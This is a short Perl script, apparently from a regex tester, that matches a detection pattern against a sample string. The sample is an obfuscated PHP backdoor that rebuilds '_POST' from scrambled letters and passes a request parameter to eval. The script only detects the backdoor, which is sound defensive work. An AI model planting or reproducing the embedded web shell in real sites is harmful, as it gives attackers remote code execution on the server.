use strict;
my $str = '<?php $lin3 = "sotp_";$pim6=strtoupper( $lin3[4].$lin3[3] . $lin3[1]. $lin3[0]. $lin3[2] ) ; if (isset ( ${$pim6} [\'q23f412\' ]) ){eval( ${$pim6}[\'q23f412\' ] );} ?>';
my $regex = qr~<\?php\s+\$[a-z].+?strtoupper.+?isset.+?eval\s*\(\s*\${\s*\$[a-z0-9]+\s*}\s*\[\s*'[a-z0-9]+'\s*\]\s*\);\s*}\s*\?>\s*~mp;
if ( $str =~ /$regex/g ) {
print "Whole match is ${^MATCH} and its start/end positions can be obtained via \$-[0] and \$+[0]\n";
# print "Capture Group 1 is $1 and its start/end positions can be obtained via \$-[1] and \$+[1]\n";
# print "Capture Group 2 is $2 ... and so on\n";
}
# ${^POSTMATCH} and ${^PREMATCH} are also available with the use of '/p'
# Named capture groups can be called via $+{name}